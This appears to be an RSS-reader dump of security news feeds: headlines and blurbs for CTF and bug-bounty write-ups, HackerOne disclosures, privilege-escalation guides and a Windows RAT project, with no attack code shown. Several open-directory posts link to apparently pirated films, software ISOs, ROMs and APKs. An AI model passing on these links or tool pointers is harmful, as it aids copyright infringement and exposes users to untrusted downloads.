    Features:  ( 4 min )
    REvil — Incident Response with Redline
    Recently, I’ve been doing some more study around incident response. To get some more practice, I decided to attempt the free TryHackMe…  ( 7 min )
    Yogosha Christmas 2021 CTF
    Hello security enthusiasts this Christmas i played “Yogosha CTF 2021” challenge as i got a mail from their team on 28th December, and i…  ( 5 min )
    Day 1, Installing Kali Linux — 100DaysofHacking
    Hello everyone , this is Ayush and from today 01–01–2022 , I’m going to start 100daysofhacking challenge to improve my hacking skills . So…  ( 3 min )
    Mirai from Hackthebox
    Pi hole Default Credentials and File System Forensics  ( 4 min )
    How I found Clickjacking bug
    Bug Bounty Writeup  ( 2 min )
    TryHackme-Vulnversity PART 1
    CTF Writeup  ( 2 min )
    Bug Hunting Journey of 2021
    Heyy Everyoneeee,  ( 22 min )
    IDOR leads to leak Private Details
    I Wish you Merry Christmas & happy new year to you readers. May this year bring us nothing more than love, joy, happiness, P1,P2…  ( 2 min )
    Year in review 2021: Top 5 things that happened in cyber security
    Hello Hackers, Yuvaraj here. Hope you are all doing good; 2021 is likely to be the year of a data breach because many big tech companies…  ( 3 min )
  • Open

    NOTE: I assume that the keys have been exchanged using any key exchange protocol.
    Features:  ( 4 min )
    REvil — Incident Response with Redline
    Recently, I’ve been doing some more study around incident response. To get some more practice, I decided to attempt the free TryHackMe…  ( 7 min )
    Yogosha Christmas 2021 CTF
    Hello security enthusiasts this Christmas i played “Yogosha CTF 2021” challenge as i got a mail from their team on 28th December, and i…  ( 5 min )
    Day 1, Installing Kali Linux — 100DaysofHacking
    Hello everyone , this is Ayush and from today 01–01–2022 , I’m going to start 100daysofhacking challenge to improve my hacking skills . So…  ( 3 min )
    Mirai from Hackthebox
    Pi hole Default Credentials and File System Forensics  ( 4 min )
    How I found Clickjacking bug
    Bug Bounty Writeup  ( 2 min )
    TryHackme-Vulnversity PART 1
    CTF Writeup  ( 2 min )
    Bug Hunting Journey of 2021
    Heyy Everyoneeee,  ( 22 min )
    IDOR leads to leak Private Details
    I Wish you Merry Christmas & happy new year to you readers. May this year bring us nothing more than love, joy, happiness, P1,P2…  ( 2 min )
    Year in review 2021: Top 5 things that happened in cyber security
    Hello Hackers, Yuvaraj here. Hope you are all doing good; 2021 is likely to be the year of a data breach because many big tech companies…  ( 3 min )
  • Open

    跨平台网络安全工具套件CaptfEncoder v3.0.1
    CaptfEncoder 是一款跨平台网络安全工具套件,V3 版本使用Rust开发,可执行程序体积小,速度更快、性能更优、功能更强。  ( 1 min )

  • Open

    Quick question
    I am a novice, please go easy on me for asking this lol. If I am asked to assign an IPv4 to a PC NIC, what does this look like in CLI? Is this the same as simply assigning an IP to the PC itself or is it something else? submitted by /u/crumbjuice [link] [comments]  ( 1 min )
    Masters degree, good and cheap ones?
    Don't ask why, I know most companies don't give a crap, I know they prefer experience, etc... Until I can get a job that isn't with my current employer/in this sector, I have to play the game as best I can. I am trying to find both a cheap and good masters degree program I can do part time and online (or at least one that is ABET\would make managers who only care about ABET happy). I am both looking at computer science and cybersecurity masters, but I got a B.S. in cybersecurity which makes masters of computer science hard to get into. So far, the only one I have found that checks those boxes is Georgia Tech's online masters (though I seriously doubt they will let me in the computer science program so I will have to do the cybersecurity one). I keep digging around but it seems all the ones I can find either charge high rates, and/or lack anything actually being taught. Do you guys know of any? All the digging around I have done has shown me that its that or get ready to fork out 30k+ (if I didn't already pay too much for my B.S.). submitted by /u/RandomPerson05478 [link] [comments]  ( 2 min )
    Is NET::ERR_CERT_DATE_INVALID a sure sign of danger?
    "Your connection is not private Attackers might be trying to steal your information from www.url.example (for example, passwords, messages, or credit cards). Learn more NET::ERR_CERT_DATE_INVALID" Hello, Recently (past few days) I have been taking up an avenue of search that has led me to many primeval websites from 2009 and earlier, And I have noticed a frequent pattern that Chrome does not want me to access these websites. However, I am having a hard time figuring out if the websites are actually dangerous or, in typically invasive fashion, the Chrome devs have simply put a roadblock in the way of accessing sites that aren't up to current standards (because sometimes they MIGHT be dangerous). Again, this is happening to rather old and niche websites from the birth of the internet. At the bottom of the warning page is a large, friendly button, saying, "Take me back to safety", which links to the chrome homepage. Thanks, and apologies if I have broken the sub rules somehow submitted by /u/Icy_Ad2505 [link] [comments]  ( 1 min )
    What is the general best practice for preventing brute force attacks while minimizing user impact ;
    I am trying to understand how to best prevent bruteforcing attacks on various externally accessible services. If you limit the amount of attempts for a given account, then you solve the bruteforcing quandary but introduce another attack vector where someone can indefintely lock out legitimate users out of their‏‏‎‏‏‎‏‏‎‏‏‎­accounts by just knowing their username. You can limit it by something like IP, but there have been several real world examples which show how cheap it is to quickly spin up thousands of different IPs to bypass this protection via AWS/Azure. I'm not aware of any other techniques that could identify legitimate requests from illegitimate ones. My thinking was something like a system in which successful logins log the IP from which it was accessed and allow login attempts from that IP even if the user is locked out. However that also has some underlying issues. What is the general security best practice for this sort of attack? submitted by /u/awedRaisins7 [link] [comments]  ( 5 min )
  • Open

    کرداری Fuzz چییە؟ بۆچی بەکار دەهێندرێ؟!
    کرداری Fuzz یەکێکە لە گرنگترین ئەو کارانەی کە هاککەر یاخوود #BugHunters یاخوود باشتر وایە بڵێم #PenTester ــــەکان بەکاری دێنن بۆ… Continue reading on Medium »  ( 1 min )
  • Open

    کرداری Fuzz چییە؟ بۆچی بەکار دەهێندرێ؟!
    کرداری Fuzz یەکێکە لە گرنگترین ئەو کارانەی کە هاککەر یاخوود #BugHunters یاخوود باشتر وایە بڵێم #PenTester ــــەکان بەکاری دێنن بۆ… Continue reading on Medium »  ( 1 min )
  • Open

    The Who 24 Bit Vinyl Pack
    http://www.xuxinlei.com/downloads/The%20Who%2024%20Bit%20Vinyl%20Pack/ [DIR] 1967 - The Who - The Who Sell Out [24-96]/ 2021-12-28 13:42 - [DIR] 1968 - The Who - Dogs & Call Me Lightning (mono single, 24-96)/ 2021-12-28 13:42 - [DIR] 1969 - Tommy [vinyl]/ 2021-12-28 13:42 - [DIR] 1971 - The Who - Meaty Beaty Big And Bouncy (24-96)/ 2021-12-28 13:42 - [DIR] 1974 - The Who - Odds & Sods/ 2021-12-28 13:42 - [DIR] The Who - A Quick One [24-96]/ 2021-12-28 13:42 - [DIR] The Who - My Generation (1965) [flac] {CR 200g, mono, 24-96}/ 2021-12-28 13:42 - [DIR] The Who - Quadrophenia (1973) [VINYL] {24-96} {Classic 200g Quiex SV-P}/ 2021-12-28 13:42 - [DIR] The Who - Who’s Next 1971/ 2021-12-28 13:42 - submitted by /u/Dagad0s [link] [comments]  ( 1 min )
    music, movies, tv
    small bit of Iranian music Index of /music/Various-Artists--Artesh-128 (r3d-dl.online) more music Index of /music/playlist (blackthebeastmusic.com) movies and tv series (Only some with English audio) Index of /download (zoppello.fr) submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Old scene releases (1999-2007)
    https://c64.rulez.org/pub/c64/Scene/Old/ submitted by /u/-ForFuckSake [link] [comments]
    Some scene releases for software, games and other things
    http://75.86.210.23/archive/ submitted by /u/-ForFuckSake [link] [comments]  ( 1 min )
    Metroid (GBA) hacks and scripts
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    NES, SNES, GBA roms
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]  ( 1 min )
    Images of "tiers" (memes)
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    RPG rulebooks
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    various stuff
    Music (amateuer bands, i guess) Index of /audio (randanderson.com) Music mashups, Oasis, Christmas and non music stuff. Index of /ayrshiredj/website/Stuff (seedhost.eu) christmas songs. Make a playlist Musical index of /radio/christmas/ (foamtotem.org) submitted by /u/International_Milk_1 [link] [comments]
  • Open

    cedowens/Inject_Dylib: Swift code to programmatically perform dylib injection
    submitted by /u/dmchell [link] [comments]
  • Open

    Turning off Wi-Fi & Bluetooth interfaces automatically in iOS
    submitted by /u/hoytva [link] [comments]
    A simple, high-level framework on how & when to effectively use WAFs
    submitted by /u/jubbaonjeans [link] [comments]  ( 3 min )
    Kickstop the Blind Ego (BlindEagle writeup by sn0wmonster from 2016)
    submitted by /u/sn0wm0nster [link] [comments]
  • Open

    How i was able to bypass a Pin code Protection
    Hello guys,  I Hope all are doing good. my name is kerolos sameh(AKA xko2x) , I’m 17 years old bug hunter in hackerone. Continue reading on Medium »  ( 2 min )
    He is already here: Privileges escalation due to invalidating current users
    Dear his/her we back again our story today is about privileges escalation This vulnerability enables the unauthorized user to add an… Continue reading on Medium »  ( 2 min )
    The Story Of How I Bypass SSO Login
    Hello everyone, Continue reading on Medium »  ( 2 min )
    elasticpwn: how to collect and analyse data from exposed Elasticsearch and Kibana instances
    Your Elasticsearch and Kibana instances are open, and that’s a real problem.. Continue reading on Medium »
    Bug Bounty Recon: Vertical Correlation (and the secret to succeeding).
    Vertical Correlation — The process of finding subdomains from a root domain. Continue reading on Medium »  ( 6 min )
  • Open

    EMAIL SPOOFING
    Khan Academy disclosed a bug submitted by hackthedevil: https://hackerone.com/reports/496360
    Default credentials lead to Spring Boot Admin dashboard access
    8x8 disclosed a bug submitted by sparroww: https://hackerone.com/reports/1417635
  • Open

    SecWiki News 2022-01-02 Review
    playwright: Playwright is a framework for Web Testing and Automation-爬虫 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    @RealTryHackMe #AdventOfCyber Series: Challenge 16 — Ransomware Madness #TisTheSeasonForHacking
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
    OSINT — Free Tools for better Satellite Imagery
    Hello Everyone, in this article we will be looking at some of the free and effective tools for Satellite imagery. Every tool has got some… Continue reading on Medium »  ( 2 min )
  • Open

    Intigriti’s December XSS challenge By E1u5iv3F0x
    This year’s Christmas challenge is crafted by E1u5iv3F0x. It was very original and educational. Continue reading on Medium »  ( 3 min )
  • Open

    ZIP file has been "obfuscated" and claims to be the 65536th part of a multi-volume archive. (cannot extract)
    submitted by /u/GalaxyDan2006 [link] [comments]  ( 1 min )
    My college gave me a voucher for the CHFI. What study material exists for it?
    Title really says it all. I am aware of people's views on EC-Council and hold some of my own but it's a free voucher and looks good. submitted by /u/threadstalkerpoint1 [link] [comments]  ( 1 min )

  • Open

    A persistent denial of service vulnerability affecting iOS
    Article URL: https://trevorspiniolas.com/doorlock/doorlock.html Comments URL: https://news.ycombinator.com/item?id=29762490 Points: 48 # Comments: 12  ( 4 min )
  • Open

    Mythology and Occultist Books.
    https://www.magicgatebg.com/Books/ Looks to be both books on mythology and occultist practices. Pretty small >1gb I think. Gotta wade through some crap, but there appears to be some good resources here. submitted by /u/GiantFangedBanana [link] [comments]  ( 1 min )
    My First Contribution
    Heres a bunch of cord-cutting apps (Firestick/Android TV) https://dr-venture.com/apks/ submitted by /u/Buddy-the-elf321 [link] [comments]
    pictures of carpet
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    iron maiden alnums zipped -(SEE COMMENT for content.) Happy new year everybody
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
  • Open

    OSINT NEDİR?
    OSINT(Open Source Intelligence) yani açık kaynak istihbaratı anlamına gelmektedir. Kısaca pasif bilgi toplama aracıdır diyebiliriz. Pasif… Continue reading on Medium »  ( 2 min )
  • Open

    How I Reverse-Engineered one of the biggest GSM Operator’s application.
    This is a story of how I found a critical bug in one of the biggest GSM Operator’s application in our country. Continue reading on Medium »  ( 5 min )
    AlbusSecurity:- Penetration-list 01 Information Disclosure — Part 1
    Hello Listeners, I hope you all are well. Firstly I will introduce myself I’m Aniket, I’m an Information technology officer at 5f eco… Continue reading on Medium »  ( 3 min )
    Oversimplified — Bug Bounty
    Undoubtedly, most of us believe that finding vulnerabilities in the software looks something like the image above. “Hacking” has always… Continue reading on Medium »  ( 5 min )
    UNAUTHORIZED ACCESS LEADS TO PII DATA LEAKAGE
    Hello Everyone, Continue reading on Medium »  ( 2 min )
    One Click To Account Takeover
    Hello amazing hunters. Continue reading on Medium »  ( 1 min )
    A tale of zero click account takeover
    Hello there! I hope everything is going well with you; today I’m back with the story of my first critical discovery on Hackerone, which is… Continue reading on Pentester Nepal »  ( 3 min )
  • Open

    Go Fuzzing
    Article URL: https://tip.golang.org/doc/fuzz/ Comments URL: https://news.ycombinator.com/item?id=29761092 Points: 175 # Comments: 49  ( 3 min )
  • Open

    I found and fixed a vulnerability in Python's source code
    submitted by /u/sn1pr0s [link] [comments]  ( 1 min )
    Fixing the Unfixable: Story of a Google Cloud SSRF
    submitted by /u/xdavidhu [link] [comments]  ( 1 min )
    Build your own reconnaissance system with Osmedeus Next Generation
    submitted by /u/j3ssiejjj [link] [comments]  ( 1 min )
  • Open

    AQUATIC PANDA in Possession of Log4Shell Exploit Tools
    submitted by /u/dmchell [link] [comments]
    Phishing o365 spoofed cloud attachments
    submitted by /u/dmchell [link] [comments]
    Windows Process Listing using ToolHelp32 API
    Get a detailed walk-through on the code of process listing using ToolHelp32 API from scratch. You will also learn to enumerate the threads and modules for each process and will know about its advantages and challenges https://tbhaxor.com/windows-process-listing-using-toolhelp32/ submitted by /u/tbhaxor [link] [comments]
    Code snippets for windows api exploitation for red and blue teams
    https://github.com/tbhaxor/WinAPI-RedBlue submitted by /u/tbhaxor [link] [comments]
  • Open

    SecWiki News 2022-01-01 Review
    2021年安全架构总结以及2022安全方向展望 by ourren 更多最新文章,请访问SecWiki
  • Open

    A question about subnetting.
    I'm very new to networking so apologies if this is a stupid question. I'm given a network ID of 172.16.1.0 /24. I need to subnet this for LAN 1 (60 hosts) and LAN 2 (20 hosts). I believe my network ID for LAN 1 will be 172.16.1.0 /26, and for LAN 2 it will be 172.16.1.64 /27. The issue is, when I try to assign LAN 1s network ID to G/0/0/0 with the subnet mask of 255.255.255.192 it doesn't work, I understand that it's class B which is usually 255.255.0.0, but if the CIDR is /26 shouldn't it be 255.255.255.192 despite this? Any feedback would be greatly appreciated thank you! submitted by /u/crumbjuice [link] [comments]  ( 2 min )
  • Open

    如何使用ChopChop扫描终端并识别暴露的敏感内容
    帮助广大研究人员针对Web应用程序进行动态应用程序测试。  ( 1 min )

  • Open

    Should I Block/Disable ICMP on router Firewall?
    Should I disable ICMP Ports on my ISPs Routers Firewall? I have heard a mix of different things. I'm trying to increase security, but I understand it will impact network monitoring by disabling it. I'm looking to disable ping. This router doen't have much options besides disiabling Incoming & outgoing and setting custom rules. Should I just disable Incoming ICMP? What can i do If anything that will increase security of ICMP. submitted by /u/Wind0ze_User [link] [comments]  ( 2 min )
    Tiktok
    1.Is it true that TikTok app is spyware? Can they access and watch us through our phone's camera even when we're not using the app? 3 . Is this is true, then how is that even legal to spy on users? Especially, minors who use this app more. submitted by /u/hamza_37 [link] [comments]  ( 3 min )
    Spyware
    Will a malware/virus/spyware still exist even after you uninstall an app from playstore or not? I downloaded many strange apps from google playstore ,uninstalled them and ran a Malwarebytes scan and nothing bad showed up, should I still be worried? submitted by /u/hamza_37 [link] [comments]  ( 1 min )
    About blockchain dapps security
    Hello I m a pen testing student doing my oscp right now and I m interested in blockchain and dapp security-pentesting. Is there a roadmap? what skills I must acquire to get me there besides learning a dapp language like plutus or solidity? Thanks in advance! submitted by /u/GeorgiosSAK [link] [comments]  ( 1 min )
  • Open

    Open-Source Intelligence (OSINT) Reconnaissance
    *Note: This article was originally published by the author on November 5, 2018, as part of the Peerlyst Red Team Book collaboration. Continue reading on Medium »  ( 8 min )
    OSINT tweets liked by @aqfiazfan in Jan — Des 2021
    Saya selalu menjadikan fitur likes di twitter sebagai lemari penting untuk menyimpan informasi terkait OSINT yang menurut saya menarik… Continue reading on Medium »  ( 1 min )
    TryHackMe — Sakura Walkthrough
    Sakura is an OSINT-focused room created by The OSINT Dojo. The room is designed to test a variety of OSINT techniques, such as social… Continue reading on Medium »  ( 5 min )
  • Open

    Evasion & Obfuscation Techniques
    *Note: This article was originally published by the author on November 7, 2018, as part of the Peerlyst Red Team Book collaboration. Continue reading on Medium »  ( 10 min )
  • Open

    Over 2.2k fonts that you can extract to your Fonts folder. (.ttf / .otf)
    Hey everyone, I have a zip file that has over 2.2k fonts that you can just extract into your Fonts folder, for example: C:\Windows\Fonts Here is the zip file, hope everyone enjoys. zip: https://drive.google.com/file/d/1bk_CFZn8CYeYDX_yiE_CPNVh4aKz2Oea/view?usp=sharing (G.Drive) submitted by /u/imjustalazyretard [link] [comments]  ( 1 min )
    My OD. Movies, Documentaries, Music, Software, ISO's and some other data.
    https://truth-or-ner.xyz/shared/ A little bit of my personal data hoard. Server has 1Gbit/s upload speed so you can grab what you want pretty quickly. Enjoy. Also happy new year! I believe that HTTPS is important but here's a link if you want to access the site without it: http://truth-or-ner.xyz/shared/ Some examples from the OD, what to expect: ISO's: Adobe Master Collection 2021, Windows 7 original, untouched versions Movies and Series: Karen, The Death of Stalin, Paper Towns, Nanny McPhee, Hidden Figures, The billion dollar code[series] Docu: Pandas 2018 docu, Inside facebook - Secrets Of A Social Network, The British Empire in Colour (3 ep) Music: mainly 2010's pop and dance I have uploaded a few more stuff since KoalaBear made the OD scan, so here's a new one: Extension (Top 5) Files Size .mkv 20 70.73 GiB .iso 6 42.51 GiB .mp4 9 12.99 GiB .zip 9 5.25 GiB .flac 49 1.69 GiB TOTAL 117 133.43GiB ​ submitted by /u/techleves [link] [comments]  ( 1 min )
    Top 25o imdb movies-But see comment
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Books/Manuals (includes Harry Potter, Alex Rider)
    submitted by /u/International_Milk_1 [link] [comments]
    runaways comics
    submitted by /u/International_Milk_1 [link] [comments]
    Ace Books (https://en.wikipedia.org/wiki/Ace_Books)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Comics - Google Drive (lets see if this last any longer)
    submitted by /u/International_Milk_1 [link] [comments]
    some vertigo comics
    submitted by /u/International_Milk_1 [link] [comments]
    75 Gigs of Docs direct dl and w/torrent available
    https://archive.org/details/pbsnovadocs submitted by /u/SingingCoyote13 [link] [comments]  ( 1 min )
    Image hosting site, mainly photos for auctions
    https://www.datazap.net/sites/ Did not see any nsfw, but did not look at everything submitted by /u/c-rn [link] [comments]
  • Open

    serpentine - C++/Win32/Boost Windows RAT (Remote Administration Tool) with a multiplatform Java/Spring RESTful C2 server and Go, C++/Qt5 frontends
    submitted by /u/jafarlihi [link] [comments]  ( 1 min )
    New year, new password habit
    submitted by /u/Novel_Author [link] [comments]  ( 1 min )
    New year, new password habit
    submitted by /u/Novel_Author [link] [comments]  ( 1 min )
  • Open

    Javascript 101 — Comparison & Conditions — 04
    Before reading that article you can also check Javascript-101 Embedding objects and arrays. Continue reading on Medium »  ( 3 min )
    My first Google HOF
    Whoever starts learning about bug hunting, their dream is to get a bounty and HOF from Google. I too got successful in June 2021 when I… Continue reading on Medium »  ( 2 min )
    AWS Lambda Command Injection
    Command Injection vulnerability is a daunting one. In this vulnerability, a threat actor can execute arbitrary commands on a host. Continue reading on Towards AWS »  ( 4 min )
  • Open

    SecWiki News 2021-12-31 Review
    万字长文:物联网十年简史 by ourren Typora 授权解密与剖析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    @RealTryHackMe #AdventOfCyber Series: Challenge 5 — Pesky Elf Forum
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
    @RealTryHackMe #AdventOfCyber Series: Challenge 4 — Santa’s Running Behind
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
  • Open

    @RealTryHackMe #AdventOfCyber Series: Challenge 5 — Pesky Elf Forum
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
    @RealTryHackMe #AdventOfCyber Series: Challenge 4 — Santa’s Running Behind
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
  • Open

    Improper authorization allows disclosing users' notification data in Notification channel server
    LINE disclosed a bug submitted by 66ed3gs: https://hackerone.com/reports/1314162 - Bounty: $2000
    ADB Backup is enabled within AndroidManifest
    Zivver disclosed a bug submitted by hack_4fun: https://hackerone.com/reports/1225158
  • Open

    PIT HackTheBox Walkthrough
    Pit is a CTF Linux box with difficulty rated as a medium on Hack The Box platform. Let’s deep dive into breaking down this machine. The post PIT HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    FreeBuf早报 | 京都大学77TB数据被误删;2022 年值得关注的5大网络安全趋势
    日本京都大学在网站发布公告,由于惠普超级计算机的备份系统出现错误,学校丢失了大约 77TB的研究数据。  ( 1 min )
    FreeBuf甲方群讨论 | 年度总结,甲方网安人的2021
    这一年有哪些令你印象深刻的事件,带给你怎样的思考,对行业现状及发展态势有何看法?甚至是聊聊职业本身,对未来职业发展有何规划?  ( 1 min )
    FreeBuf周报 |《“十四五”国家信息化规划》发布;Apache 修复关键漏洞
    我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!  ( 1 min )
    Kimsuky组织针对韩国新闻行业的钓鱼活动分析
    Kimsuky是一个疑似来源于半岛方向的网络间谍组织,其至少自 2012 年以来一直保持活跃。  ( 1 min )
    为什么说减少开发人员和安全团队之间摩擦有助提高软件安全性
    与其将安全性推迟到以后,不如让它成为开发过程的核心部分。
    渗透测试之地基服务篇:服务攻防之框架Struts2(上)
    Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。  ( 1 min )
    新型恶意软件 iLOBleed Rootkit,首次针对惠普 iLO 固件
    iLOBleed 是有史以来首次针对惠普 iLO 固件的恶意软件。  ( 1 min )
    日本惠普超算系统出错,京都大学多达77TB数据被误删
    日本京都大学在网站发布公告称,由于惠普超级计算机的备份系统出现错误,学校丢失了大约 77TB的研究数据。
  • Open

    Windows Process Listing Using WTS API
    In these detailed walkthroughs of process listing using WTS API, you will learn the importance of the process listing and enumeration of anti-malware agents and will get your hands dirty with the source code https://tbhaxor.com/windows-process-listing-using-wtsapi32/ https://tbhaxor.com/windows-process-listing-using-wtsapi32-2/ submitted by /u/tbhaxor [link] [comments]

  • Open

    Movies and tv, but not sure how much in english. Seems to be vey slow.
    submitted by /u/International_Milk_1 [link] [comments]
    Racer X stuff
    submitted by /u/International_Milk_1 [link] [comments]
    Creating your own flair
    So you want to share a link to top secret documents. You want to call the Flair "Could get you killed" Just pick any of the default flairs, enter it in document, highlight it, and write "could get you killed" instead. submitted by /u/International_Milk_1 [link] [comments]
    comics, and Ebooks
    submitted by /u/International_Milk_1 [link] [comments]
    ]Kamen Rider Build BD Box Complete Series [1080p]-english subs
    submitted by /u/International_Milk_1 [link] [comments]
    Star tek films, movies. comics. etc etc
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Ghibli's Films - Google Drive
    submitted by /u/International_Milk_1 [link] [comments]
    Bond movies (Note sure, if this is correct link)-see comment
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Games (don't know if link's work)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Tom and Jerry cartoons
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    comics
    submitted by /u/International_Milk_1 [link] [comments]
    Movies
    http://167.114.174.132:9092/movies/ Haven't looked too far thru this yet but good amount of movies. submitted by /u/Prhymus [link] [comments]
    Indian (I'm assuming) music
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    Not only cybersecurity
    Hi, I really love cybersecurity stuff, but as I practice with TryHackMe/HackTheBox labs, I feel that some programming knowledge is also required. What are your studying topics, besides offensive/defensive techniques? Can you recommend some good resources for PHP, assembler, javascript and so on? Thankyou!! submitted by /u/g-simon [link] [comments]  ( 1 min )
    DNSSEC with unsigned records set
    Hello everyone, I'm currently implementing a DNSSEC validator (at https://github.com/qdm12/dns). It's working so far, but most zones aren't signed (even google.com it seems). How is a DNSSEC validator meant to handle unsigned cases? Should it just let it through without any validation? Or should it check somewhere else if a zone is meant to be signed? Or should we patiently wait for DNSSEC to be more widely adopted? I'm wondering for example in the case an attacker hacks an authoritative nameserver like Cloudflare's 1.1.1.1 and returns bad records without their previously existing RRSIG signatures. A DNSSEC validator (without caching or on a cold boot) will not detect the bad records from Cloudflare right? Thanks in advance! submitted by /u/dowitex [link] [comments]  ( 1 min )
    Are Server+, Cloud+, and Linux+ certifications useful for InfoSec?
    submitted by /u/Connect_Estate_8617 [link] [comments]  ( 1 min )
    I accessed someone else's Yahoo mail by mistake. This needs to get fixed ASAP
    hello everyone I got a new phone number, and something really unbelievable happened to me: I was able to access someone else's Yahoo! mail account - the previous user of that phone number. I Googled it to see if anyone else has experienced this, and cybersecurity expert Brian Krebs reports that has in this article: https://krebsonsecurity.com/2019/03/why-phone-numbers-stink-as-identity-proof/ From the article itself : " This is exactly what happened recently to a reader who shared this account: A while ago I bought a new phone number. I went on Yahoo! mail and typed in the phone number in the login. It asked me if I wanted to receive an SMS to gain access. I said yes, and it sent me a verification key or access code via SMS. I typed the code I received. I was surprised that I didn’…  ( 4 min )
    Is IT experience a requirement for SOC Analyst?
    Is it required that you worked in the help desk or be a sysadmin? If so, how many years? Or is home experience enough for the roll(example: homelab, ctfs, github projects) submitted by /u/RaZdoT [link] [comments]  ( 2 min )
    Phone Tapping -- Call Forwarding UNconditionally, but everything else is NOT forwarded
    So I checked my dad's phone for tapping. This is what the system message said: Call forwarding unconditionally. Voice: Not forwarded Data: Not forwarded FAX: Not forwarded SMS: Not forwarded Sync: Not forwarded Async: Not forwarded Packet: Not forwarded PAD: Not forwarded OK Given the info above, is he still being phone tapped? Last time, he was and I saw the number. Now I didn't. submitted by /u/Then-Mathematician76 [link] [comments]  ( 1 min )
    Are You Running Linux As Your Main Workstation?
    Are you running Linux as your main workstation? What do the professionals run as their main operating system? submitted by /u/No_Secret6425 [link] [comments]  ( 2 min )
    Offsec Discontinue Kali on Azure?
    Did Offensive Security discontinue support for Kali on the Azure cloud? https://github.com/Azure/azure-cli/issues/17469 Found this thread and can’t find Kali in the azure marketplace or on their site anymore. submitted by /u/DeadbeatHoneyBadger [link] [comments]
  • Open

    Ffuf TryHackMe par
    Writeup  ( 2 min )
    Easy Premium Account Access and Admin role escalation via Object manipulation in the server…
    Hey infosec Geeks ✌,  ( 2 min )
    HacktoberFest2k21 vulnerability: How users metadata can be changed via Auth JWT tokens leaking from…
    Hello Awesome readers 👨‍💻✌✌,  ( 3 min )
    Cookie Stealing via Clickjacking using Burp collaborator
    Hello 👋 infosec geeks 👨‍💻 this is my 4th blog post,  ( 2 min )
    Massive Users Account Takeovers(Chaining Vulnerabilities to IDOR)
    Hello hunters 👋✌ this is my 7th writeup 🧾,  ( 3 min )
    CTF Write-Up: Kryptonite
    CTF challenge available at ctf-mystiko.com.  ( 5 min )
  • Open

    Ffuf TryHackMe par
    Writeup  ( 2 min )
    Easy Premium Account Access and Admin role escalation via Object manipulation in the server…
    Hey infosec Geeks ✌,  ( 2 min )
    HacktoberFest2k21 vulnerability: How users metadata can be changed via Auth JWT tokens leaking from…
    Hello Awesome readers 👨‍💻✌✌,  ( 3 min )
    Cookie Stealing via Clickjacking using Burp collaborator
    Hello 👋 infosec geeks 👨‍💻 this is my 4th blog post,  ( 2 min )
    Massive Users Account Takeovers(Chaining Vulnerabilities to IDOR)
    Hello hunters 👋✌ this is my 7th writeup 🧾,  ( 3 min )
    CTF Write-Up: Kryptonite
    CTF challenge available at ctf-mystiko.com.  ( 5 min )
  • Open

    Read-only user can edit user segments.
    Mail.ru disclosed a bug submitted by astates: https://hackerone.com/reports/1277753
    DLL hijacking in Monero GUI for Windows 0.17.3.0 would allow an attacker to perform remote command execution
    Monero disclosed a bug submitted by fukuyama: https://hackerone.com/reports/1437942
    API- /
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/1354452
    Change project visibility to a restricted option
    GitLab disclosed a bug submitted by s4nderdevelopment: https://hackerone.com/reports/1086781 - Bounty: $1370
  • Open

    Windows Privilege Escalation: Kernel Exploit
    As this series was dedicated to Windows Privilege escalation thus I’m writing this Post to explain command practice for kernel-mode exploitation. Table of Content What The post Windows Privilege Escalation: Kernel Exploit appeared first on Hacking Articles.  ( 5 min )
  • Open

    Here’s How I Could Read Anyone’s Iphone Metrics Remotely.
    Hello, My name is Faizan. I’m a security researcher. Hope you like this blog. If you’ve any questions please feel free to reach out . Continue reading on Medium »  ( 2 min )
    TryHackMe Writeup : Solar, exploiting Log4J
    Hi there, Continue reading on Medium »  ( 6 min )
    Javascript 101 - Embedding objects & Arrays — 03
    Before reading this, you can look at Javascript 101 — Arithmetic Operators, Code Editors, Functions, Objects, and Arrays — 02. Continue reading on Medium »  ( 3 min )
    Caduceus Bug Bounty Challenge
    Caduceus has just entered its public testing phase and is launching this hackathon to identify bugs. Continue reading on Medium »  ( 2 min )
    Bitswift Unlimited Mint Bugfix Postmortem
    Summary Continue reading on Immunefi »  ( 4 min )
    The Password Bypass Leads to Full-Account-Takeover
    Hola Hackers, I’m Saransh Saraf aka MR23R0 Continue reading on Medium »  ( 1 min )
  • Open

    [Cellebrite Physical Analyzer] Basic usage question, easily resuming a session/case with multiple extractions
    Just started working with this program. I understand how to open and browse extractions, but I can't figure out if there's a better way to pick up where I left off after closing the program, I end up having to open/import all the extractions one by one again. For most programs that I'm familiar with, a "case" contains one or more extractions that I imported and "opening a case" tends to be a convenient way to bring up all the extractions in one "click". However, based on how little experience I have with PA, "opening a case" seems to just be a prompt to import extractions all over again. I thought about using "project sessions", but it seems to be something that you open after all the extractions are open that remembers what analysis you've done, not necessarily what devices you were working on. Can anyone speak to this? Am I oblivious to a basic function that lets me easily open all the extractions I had open? Maybe I'm supposed to create a portable case (UFDX?) or something? submitted by /u/PieWithIceCreamCrust [link] [comments]  ( 2 min )
  • Open

    SecWiki News 2021-12-30 Review
